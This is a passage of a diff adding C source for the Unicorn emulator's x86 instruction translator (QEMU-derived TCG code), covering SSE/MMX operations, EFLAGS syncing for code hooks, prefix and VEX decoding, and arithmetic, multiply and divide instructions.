tcg_gen_st_i32(tcg_ctx, cpu_tmp2_i32, cpu_env, + offsetof(CPUX86State,xmm_regs[reg] + .XMM_L((val >> 4) & 3))); + if 
((val >> 0) & 1) + tcg_gen_st_i32(tcg_ctx, tcg_const_i32(tcg_ctx, 0 /*float32_zero*/), + cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_L(0))); + if ((val >> 1) & 1) + tcg_gen_st_i32(tcg_ctx, tcg_const_i32(tcg_ctx, 0 /*float32_zero*/), + cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_L(1))); + if ((val >> 2) & 1) + tcg_gen_st_i32(tcg_ctx, tcg_const_i32(tcg_ctx, 0 /*float32_zero*/), + cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_L(2))); + if ((val >> 3) & 1) + tcg_gen_st_i32(tcg_ctx, tcg_const_i32(tcg_ctx, 0 /*float32_zero*/), + cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_L(3))); + break; + case 0x22: + if (ot == MO_32) { /* pinsrd */ + if (mod == 3) { + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_regs[rm]); + } else { + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + } + tcg_gen_st_i32(tcg_ctx, cpu_tmp2_i32, cpu_env, + offsetof(CPUX86State, + xmm_regs[reg].XMM_L(val & 3))); + } else { /* pinsrq */ +#ifdef TARGET_X86_64 + if (mod == 3) { + gen_op_mov_v_reg(tcg_ctx, ot, cpu_tmp1_i64, rm); + } else { + tcg_gen_qemu_ld_i64(s->uc, cpu_tmp1_i64, cpu_A0, + s->mem_index, MO_LEQ); + } + tcg_gen_st_i64(tcg_ctx, cpu_tmp1_i64, cpu_env, + offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(val & 1))); +#else + goto illegal_op; +#endif + } + break; + } + return; + } + + if (b1) { + op1_offset = offsetof(CPUX86State,xmm_regs[reg]); + if (mod == 3) { + op2_offset = offsetof(CPUX86State,xmm_regs[rm | REX_B(s)]); + } else { + op2_offset = offsetof(CPUX86State,xmm_t0); + gen_lea_modrm(env, s, modrm); + gen_ldo_env_A0(s, op2_offset); + } + } else { + op1_offset = offsetof(CPUX86State,fpregs[reg].mmx); + if (mod == 3) { + op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); + } else { + op2_offset = offsetof(CPUX86State,mmx_t0); + gen_lea_modrm(env, s, modrm); + gen_ldq_env_A0(s, op2_offset); + } + } + val = cpu_ldub_code(env, s->pc++); + + if ((b & 0xfc) == 0x60) { /* pcmpXstrX */ + set_cc_op(s, CC_OP_EFLAGS); + + if (s->dflag == MO_64) { + 
/* The helper must use entire 64-bit gp registers */ + val |= 1 << 8; + } + } + + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + sse_fn_eppi(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1, tcg_const_i32(tcg_ctx, val)); + break; + + case 0x33a: + /* Various integer extensions at 0f 3a f[0-f]. */ + b = modrm | (b1 << 8); + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + + switch (b) { + case 0x3f0: /* rorx Gy,Ey, Ib */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + b = cpu_ldub_code(env, s->pc++); + if (ot == MO_64) { + tcg_gen_rotri_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], b & 63); + } else { + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + tcg_gen_rotri_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, b & 31); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_T[0], cpu_tmp2_i32); + } + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + + default: + goto illegal_op; + } + break; + + default: + goto illegal_op; + } + } else { + /* generic MMX or SSE operation */ + switch(b) { + case 0x70: /* pshufx insn */ + case 0xc6: /* pshufx insn */ + case 0xc2: /* compare insns */ + s->rip_offset = 1; + break; + default: + break; + } + if (is_xmm) { + op1_offset = offsetof(CPUX86State,xmm_regs[reg]); + if (mod != 3) { + int sz = 4; + + gen_lea_modrm(env, s, modrm); + op2_offset = offsetof(CPUX86State,xmm_t0); + + if( (b >= 0x50 && b <= 0x5a) || + (b >= 0x5c && b <= 0x5f) || + b == 0xc2 ) { + /* Most sse scalar operations. 
*/ + if (b1 == 2) { + sz = 2; + } else if (b1 == 3) { + sz = 3; + } + } else if( b == 0x2e || /* ucomis[sd] */ + b == 0x2f ) /* comis[sd] */ + { + if (b1 == 0) { + sz = 2; + } else { + sz = 3; + } + } + + switch (sz) { + case 2: + /* 32 bit access */ + gen_op_ld_v(s, MO_32, *cpu_T[0], cpu_A0); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,xmm_t0.XMM_L(0))); + break; + case 3: + /* 64 bit access */ + gen_ldq_env_A0(s, offsetof(CPUX86State, xmm_t0.XMM_D(0))); + break; + default: + /* 128 bit access */ + gen_ldo_env_A0(s, op2_offset); + break; + } + } else { + rm = (modrm & 7) | REX_B(s); + op2_offset = offsetof(CPUX86State,xmm_regs[rm]); + } + } else { + op1_offset = offsetof(CPUX86State,fpregs[reg].mmx); + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + op2_offset = offsetof(CPUX86State,mmx_t0); + gen_ldq_env_A0(s, op2_offset); + } else { + rm = (modrm & 7); + op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); + } + } + switch(b) { + case 0x0f: /* 3DNow! data insns */ + if (!(s->cpuid_ext2_features & CPUID_EXT2_3DNOW)) + goto illegal_op; + val = cpu_ldub_code(env, s->pc++); + sse_fn_epp = sse_op_table5[val]; + if (!sse_fn_epp) { + goto illegal_op; + } + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + sse_fn_epp(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + case 0x70: /* pshufx insn */ + case 0xc6: /* pshufx insn */ + val = cpu_ldub_code(env, s->pc++); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + /* XXX: introduce a new table? 
*/ + sse_fn_ppi = (SSEFunc_0_ppi)sse_fn_epp; + sse_fn_ppi(tcg_ctx, cpu_ptr0, cpu_ptr1, tcg_const_i32(tcg_ctx, val)); + break; + case 0xc2: + /* compare insns */ + val = cpu_ldub_code(env, s->pc++); + if (val >= 8) + goto illegal_op; + sse_fn_epp = sse_op_table4[val][b1]; + + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + sse_fn_epp(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + case 0xf7: + /* maskmov : we must prepare A0 */ + if (mod != 3) + goto illegal_op; + tcg_gen_mov_tl(tcg_ctx, cpu_A0, *cpu_regs[R_EDI]); + gen_extu(tcg_ctx, s->aflag, cpu_A0); + gen_add_A0_ds_seg(s); + + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + /* XXX: introduce a new table? */ + sse_fn_eppt = (SSEFunc_0_eppt)sse_fn_epp; + sse_fn_eppt(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1, cpu_A0); + break; + default: + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + sse_fn_epp(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + } + if (b == 0x2e || b == 0x2f) { + set_cc_op(s, CC_OP_EFLAGS); + } + } +} + +// Unicorn: sync EFLAGS on demand. Emits TCG ops that materialize the +// lazily-tracked condition codes into env->eflags so that code hooks +// (see the UC_HOOK_CODE path in disas_insn) observe up-to-date flags. +// Uses *cpu_T[0] as a scratch register, so its previous contents are +// clobbered. +static void sync_eflags(DisasContext *s, TCGContext *tcg_ctx) +{ + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + TCGv_ptr cpu_env = tcg_ctx->cpu_env; + + gen_update_cc_op(s); /* commit the pending cc_op so the helper sees it */ + gen_helper_read_eflags(tcg_ctx, *cpu_T[0], cpu_env); /* full EFLAGS -> T0 */ + tcg_gen_st_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, eflags)); /* persist into env->eflags */ +} + +/* +static void restore_eflags(DisasContext *s, TCGContext *tcg_ctx) +{ + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + TCGv_ptr cpu_env = tcg_ctx->cpu_env; + + tcg_gen_ld_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, eflags)); + gen_helper_write_eflags(tcg_ctx, cpu_env, *cpu_T[0], + tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | ID_MASK | NT_MASK) & 0xffff)); + set_cc_op(s, CC_OP_EFLAGS); +} +*/ + +/* convert one instruction. 
s->is_jmp is set if the translation must + be stopped. Return the next pc value */ +static target_ulong disas_insn(CPUX86State *env, DisasContext *s, + target_ulong pc_start) // qq +{ + int b, prefixes; + int shift; + TCGMemOp ot, aflag, dflag; + int modrm, reg, rm, mod, op, opreg, val; + target_ulong next_eip, tval; + int rex_w, rex_r; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_ptr cpu_env = tcg_ctx->cpu_env; + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; + TCGv_i32 cpu_tmp3_i32 = tcg_ctx->cpu_tmp3_i32; + TCGv_i64 cpu_tmp1_i64 = tcg_ctx->cpu_tmp1_i64; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_cc_srcT = *(TCGv *)tcg_ctx->cpu_cc_srcT; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + TCGv cpu_tmp4 = *(TCGv *)tcg_ctx->cpu_tmp4; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + TCGArg *save_opparam_ptr = tcg_ctx->gen_opparam_ptr; + bool cc_op_dirty = s->cc_op_dirty; + bool changed_cc_op = false; + + s->pc = pc_start; + s->prefix = 0; + + // end address tells us to stop emulation + if (s->pc == s->uc->addr_end) { + // imitate the HLT instruction + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_hlt(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); + s->is_jmp = DISAS_TB_JUMP; + return s->pc; + } + + if (unlikely(qemu_loglevel_mask(CPU_LOG_TB_OP | CPU_LOG_TB_OP_OPT))) { + tcg_gen_debug_insn_start(tcg_ctx, pc_start); + } + + // Unicorn: trace this instruction on request + if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, pc_start)) { + if (s->last_cc_op != s->cc_op) { + sync_eflags(s, tcg_ctx); + s->last_cc_op = s->cc_op; + changed_cc_op = true; + } + gen_uc_tracecode(tcg_ctx, 0xf1f1f1f1, UC_HOOK_CODE_IDX, env->uc, pc_start); + // the callback might want to stop emulation immediately + check_exit_request(tcg_ctx); + } + + prefixes = 0; + s->override = -1; + rex_w = -1; + rex_r = 0; 
+#ifdef TARGET_X86_64 + s->rex_x = 0; + s->rex_b = 0; + s->uc = env->uc; + tcg_ctx->x86_64_hregs = 0; +#endif + s->rip_offset = 0; /* for relative ip address */ + s->vex_l = 0; + s->vex_v = 0; + next_byte: + b = cpu_ldub_code(env, s->pc); + s->pc++; + /* Collect prefixes. */ + switch (b) { + case 0xf3: + prefixes |= PREFIX_REPZ; + goto next_byte; + case 0xf2: + prefixes |= PREFIX_REPNZ; + goto next_byte; + case 0xf0: + prefixes |= PREFIX_LOCK; + goto next_byte; + case 0x2e: + s->override = R_CS; + goto next_byte; + case 0x36: + s->override = R_SS; + goto next_byte; + case 0x3e: + s->override = R_DS; + goto next_byte; + case 0x26: + s->override = R_ES; + goto next_byte; + case 0x64: + s->override = R_FS; + goto next_byte; + case 0x65: + s->override = R_GS; + goto next_byte; + case 0x66: + prefixes |= PREFIX_DATA; + goto next_byte; + case 0x67: + prefixes |= PREFIX_ADR; + goto next_byte; +#ifdef TARGET_X86_64 + case 0x40: + case 0x41: + case 0x42: + case 0x43: + case 0x44: + case 0x45: + case 0x46: + case 0x47: + case 0x48: + case 0x49: + case 0x4a: + case 0x4b: + case 0x4c: + case 0x4d: + case 0x4e: + case 0x4f: + if (CODE64(s)) { + /* REX prefix */ + rex_w = (b >> 3) & 1; + rex_r = (b & 0x4) << 1; + s->rex_x = (b & 0x2) << 2; + REX_B(s) = (b & 0x1) << 3; + tcg_ctx->x86_64_hregs = 1; /* select uniform byte register addressing */ + goto next_byte; + } + break; +#endif + case 0xc5: /* 2-byte VEX */ + case 0xc4: /* 3-byte VEX */ + /* VEX prefixes cannot be used except in 32-bit mode. + Otherwise the instruction is LES or LDS. */ + if (s->code32 && !s->vm86) { + static const int pp_prefix[4] = { + 0, PREFIX_DATA, PREFIX_REPZ, PREFIX_REPNZ + }; + int vex3, vex2 = cpu_ldub_code(env, s->pc); + + if (!CODE64(s) && (vex2 & 0xc0) != 0xc0) { + /* 4.1.4.6: In 32-bit mode, bits [7:6] must be 11b, + otherwise the instruction is LES or LDS. */ + break; + } + s->pc++; + + /* 4.1.1-4.1.3: No preceding lock, 66, f2, f3, or rex prefixes. 
*/ + if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ + | PREFIX_LOCK | PREFIX_DATA)) { + goto illegal_op; + } +#ifdef TARGET_X86_64 + if (tcg_ctx->x86_64_hregs) { + goto illegal_op; + } +#endif + rex_r = (~vex2 >> 4) & 8; + if (b == 0xc5) { + vex3 = vex2; + b = cpu_ldub_code(env, s->pc++) | 0x100; + } else { +#ifdef TARGET_X86_64 + s->rex_x = (~vex2 >> 3) & 8; + s->rex_b = (~vex2 >> 2) & 8; +#endif + vex3 = cpu_ldub_code(env, s->pc++); + rex_w = (vex3 >> 7) & 1; + switch (vex2 & 0x1f) { + case 0x01: /* Implied 0f leading opcode bytes. */ + b = cpu_ldub_code(env, s->pc++) | 0x100; + break; + case 0x02: /* Implied 0f 38 leading opcode bytes. */ + b = 0x138; + break; + case 0x03: /* Implied 0f 3a leading opcode bytes. */ + b = 0x13a; + break; + default: /* Reserved for future use. */ + goto illegal_op; + } + } + s->vex_v = (~vex3 >> 3) & 0xf; + s->vex_l = (vex3 >> 2) & 1; + prefixes |= pp_prefix[vex3 & 3] | PREFIX_VEX; + } + break; + } + + /* Post-process prefixes. */ + if (CODE64(s)) { + /* In 64-bit mode, the default data size is 32-bit. Select 64-bit + data with rex_w, and 16-bit data with 0x66; rex_w takes precedence + over 0x66 if both are present. */ + dflag = (rex_w > 0 ? MO_64 : prefixes & PREFIX_DATA ? MO_16 : MO_32); + /* In 64-bit mode, 0x67 selects 32-bit addressing. */ + aflag = (prefixes & PREFIX_ADR ? MO_32 : MO_64); + } else { + /* In 16/32-bit mode, 0x66 selects the opposite data size. */ + if (s->code32 ^ ((prefixes & PREFIX_DATA) != 0)) { // qq + dflag = MO_32; + } else { + dflag = MO_16; + } + /* In 16/32-bit mode, 0x67 selects the opposite addressing. 
*/ + if (s->code32 ^ ((prefixes & PREFIX_ADR) != 0)) { + aflag = MO_32; + } else { + aflag = MO_16; + } + } + + s->prefix = prefixes; + s->aflag = aflag; + s->dflag = dflag; + + /* lock generation */ + if (prefixes & PREFIX_LOCK) + gen_helper_lock(tcg_ctx, cpu_env); + + /* now check op code */ + reswitch: + switch(b) { + case 0x0f: + /**************************/ + /* extended op code */ + b = cpu_ldub_code(env, s->pc++) | 0x100; + goto reswitch; + + /**************************/ + /* arith & logic */ + case 0x00: case 0x01: case 0x02: case 0x03: case 0x04: case 0x05: //case 0x00 ... 0x05: + case 0x08: case 0x09: case 0x0a: case 0x0b: case 0x0c: case 0x0d: //case 0x08 ... 0x0d: + case 0x10: case 0x11: case 0x12: case 0x13: case 0x14: case 0x15: //case 0x10 ... 0x15: + case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: //case 0x18 ... 0x1d: + case 0x20: case 0x21: case 0x22: case 0x23: case 0x24: case 0x25: //case 0x20 ... 0x25: + case 0x28: case 0x29: case 0x2a: case 0x2b: case 0x2c: case 0x2d: //case 0x28 ... 0x2d: + case 0x30: case 0x31: case 0x32: case 0x33: case 0x34: case 0x35: //case 0x30 ... 0x35: + case 0x38: case 0x39: case 0x3a: case 0x3b: case 0x3c: case 0x3d: //case 0x38 ... 
0x3d: + { + int op, f, val; + op = (b >> 3) & 7; + f = (b >> 1) & 3; + + ot = mo_b_d(b, dflag); + + switch(f) { + case 0: /* OP Ev, Gv */ + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + opreg = OR_TMP0; + } else if (op == OP_XORL && rm == reg) { + xor_zero: + /* xor reg, reg optimisation */ + set_cc_op(s, CC_OP_CLR); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], 0); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + } else { + opreg = rm; + } + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], reg); + gen_op(s, op, ot, opreg); + break; + case 1: /* OP Gv, Ev */ + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + reg = ((modrm >> 3) & 7) | rex_r; + rm = (modrm & 7) | REX_B(s); + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, ot, *cpu_T[1], cpu_A0); + } else if (op == OP_XORL && rm == reg) { + goto xor_zero; + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], rm); + } + gen_op(s, op, ot, reg); + break; + case 2: /* OP A, Iv */ + val = insn_get(env, s, ot); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], val); + gen_op(s, op, ot, OR_EAX); + break; + } + } + break; + + case 0x82: + if (CODE64(s)) + goto illegal_op; + case 0x80: /* GRP1 */ + case 0x81: + case 0x83: + { + int val; + + ot = mo_b_d(b, dflag); + + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + op = (modrm >> 3) & 7; + + if (mod != 3) { + if (b == 0x83) + s->rip_offset = 1; + else + s->rip_offset = insn_const_size(ot); + gen_lea_modrm(env, s, modrm); + opreg = OR_TMP0; + } else { + opreg = rm; + } + + switch(b) { + default: + case 0x80: + case 0x81: + case 0x82: + val = insn_get(env, s, ot); + break; + case 0x83: + val = (int8_t)insn_get(env, s, MO_8); + break; + } + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], val); + gen_op(s, op, ot, opreg); + } + break; + + /**************************/ + /* inc, dec, and other misc 
arith */ + case 0x40: case 0x41: case 0x42: case 0x43: + case 0x44: case 0x45: case 0x46: case 0x47: //case 0x40 ... 0x47: /* inc Gv */ + ot = dflag; + gen_inc(s, ot, OR_EAX + (b & 7), 1); + break; + case 0x48: case 0x49: case 0x4a: case 0x4b: + case 0x4c: case 0x4d: case 0x4e: case 0x4f: //case 0x48 ... 0x4f: /* dec Gv */ + ot = dflag; + gen_inc(s, ot, OR_EAX + (b & 7), -1); + break; + case 0xf6: /* GRP3 */ + case 0xf7: + ot = mo_b_d(b, dflag); + + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + op = (modrm >> 3) & 7; + if (mod != 3) { + if (op == 0) + s->rip_offset = insn_const_size(ot); + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], rm); + } + + switch(op) { + case 0: /* test */ + val = insn_get(env, s, ot); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], val); + gen_op_testl_T0_T1_cc(tcg_ctx); + set_cc_op(s, CC_OP_LOGICB + ot); + break; + case 2: /* not */ + tcg_gen_not_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + if (mod != 3) { + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } + break; + case 3: /* neg */ + tcg_gen_neg_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + if (mod != 3) { + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } + gen_op_update_neg_cc(tcg_ctx); + set_cc_op(s, CC_OP_SUBB + ot); + break; + case 4: /* mul */ + switch(ot) { + case MO_8: + gen_op_mov_v_reg(tcg_ctx, MO_8, *cpu_T[1], R_EAX); + tcg_gen_ext8u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_ext8u_tl(tcg_ctx, *cpu_T[1], *cpu_T[1]); + /* XXX: use 32 bit mul which could be faster */ + tcg_gen_mul_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EAX, *cpu_T[0]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + tcg_gen_andi_tl(tcg_ctx, cpu_cc_src, *cpu_T[0], 0xff00); + set_cc_op(s, CC_OP_MULB); + break; + case MO_16: + gen_op_mov_v_reg(tcg_ctx, MO_16, 
*cpu_T[1], R_EAX); + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[1], *cpu_T[1]); + /* XXX: use 32 bit mul which could be faster */ + tcg_gen_mul_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EAX, *cpu_T[0]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + tcg_gen_shri_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 16); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EDX, *cpu_T[0]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, *cpu_T[0]); + set_cc_op(s, CC_OP_MULW); + break; + default: + case MO_32: + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp3_i32, *cpu_regs[R_EAX]); + tcg_gen_mulu2_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp3_i32, + cpu_tmp2_i32, cpu_tmp3_i32); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[R_EAX], cpu_tmp2_i32); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[R_EDX], cpu_tmp3_i32); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_regs[R_EAX]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, *cpu_regs[R_EDX]); + set_cc_op(s, CC_OP_MULL); + break; +#ifdef TARGET_X86_64 + case MO_64: + tcg_gen_mulu2_i64(tcg_ctx, *cpu_regs[R_EAX], *cpu_regs[R_EDX], + *cpu_T[0], *cpu_regs[R_EAX]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_regs[R_EAX]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, *cpu_regs[R_EDX]); + set_cc_op(s, CC_OP_MULQ); + break; +#endif + } + break; + case 5: /* imul */ + switch(ot) { + case MO_8: + gen_op_mov_v_reg(tcg_ctx, MO_8, *cpu_T[1], R_EAX); + tcg_gen_ext8s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_ext8s_tl(tcg_ctx, *cpu_T[1], *cpu_T[1]); + /* XXX: use 32 bit mul which could be faster */ + tcg_gen_mul_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EAX, *cpu_T[0]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + tcg_gen_ext8s_tl(tcg_ctx, cpu_tmp0, *cpu_T[0]); + tcg_gen_sub_tl(tcg_ctx, cpu_cc_src, *cpu_T[0], cpu_tmp0); + set_cc_op(s, CC_OP_MULB); + break; + case MO_16: + gen_op_mov_v_reg(tcg_ctx, MO_16, *cpu_T[1], R_EAX); + 
tcg_gen_ext16s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_ext16s_tl(tcg_ctx, *cpu_T[1], *cpu_T[1]); + /* XXX: use 32 bit mul which could be faster */ + tcg_gen_mul_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EAX, *cpu_T[0]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + tcg_gen_ext16s_tl(tcg_ctx, cpu_tmp0, *cpu_T[0]); + tcg_gen_sub_tl(tcg_ctx, cpu_cc_src, *cpu_T[0], cpu_tmp0); + tcg_gen_shri_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 16); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EDX, *cpu_T[0]); + set_cc_op(s, CC_OP_MULW); + break; + default: + case MO_32: + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp3_i32, *cpu_regs[R_EAX]); + tcg_gen_muls2_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp3_i32, + cpu_tmp2_i32, cpu_tmp3_i32); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[R_EAX], cpu_tmp2_i32); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[R_EDX], cpu_tmp3_i32); + tcg_gen_sari_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, 31); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_regs[R_EAX]); + tcg_gen_sub_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, cpu_tmp3_i32); + tcg_gen_extu_i32_tl(tcg_ctx, cpu_cc_src, cpu_tmp2_i32); + set_cc_op(s, CC_OP_MULL); + break; +#ifdef TARGET_X86_64 + case MO_64: + tcg_gen_muls2_i64(tcg_ctx, *cpu_regs[R_EAX], *cpu_regs[R_EDX], + *cpu_T[0], *cpu_regs[R_EAX]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_regs[R_EAX]); + tcg_gen_sari_tl(tcg_ctx, cpu_cc_src, *cpu_regs[R_EAX], 63); + tcg_gen_sub_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, *cpu_regs[R_EDX]); + set_cc_op(s, CC_OP_MULQ); + break; +#endif + } + break; + case 6: /* div */ + switch(ot) { + case MO_8: + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_divb_AL(tcg_ctx, cpu_env, *cpu_T[0]); + break; + case MO_16: + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_divw_AX(tcg_ctx, cpu_env, *cpu_T[0]); + break; + default: + case MO_32: + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_divl_EAX(tcg_ctx, cpu_env, *cpu_T[0]); + break; +#ifdef 
TARGET_X86_64 + case MO_64: + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_divq_EAX(tcg_ctx, cpu_env, *cpu_T[0]); + break; +#endif + } + break; + case 7: /* idiv */ + switch(ot) { + case MO_8: + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_idivb_AL(tcg_ctx, cpu_env, *cpu_T[0]); + break; + case MO_16: + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_idivw_AX(tcg_ctx, cpu_env, *cpu_T[0]); + break; + default: + case MO_32: + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_idivl_EAX(tcg_ctx, cpu_env, *cpu_T[0]); + break; +#ifdef TARGET_X86_64 + case MO_64: + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_idivq_EAX(tcg_ctx, cpu_env, *cpu_T[0]); + break; +#endif + } + break; + default: + goto illegal_op; + } + break; + + case 0xfe: /* GRP4 */ + case 0xff: /* GRP5 */ + ot = mo_b_d(b, dflag); + + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + op = (modrm >> 3) & 7; + if (op >= 2 && b == 0xfe) { + goto illegal_op; + } + if (CODE64(s)) { 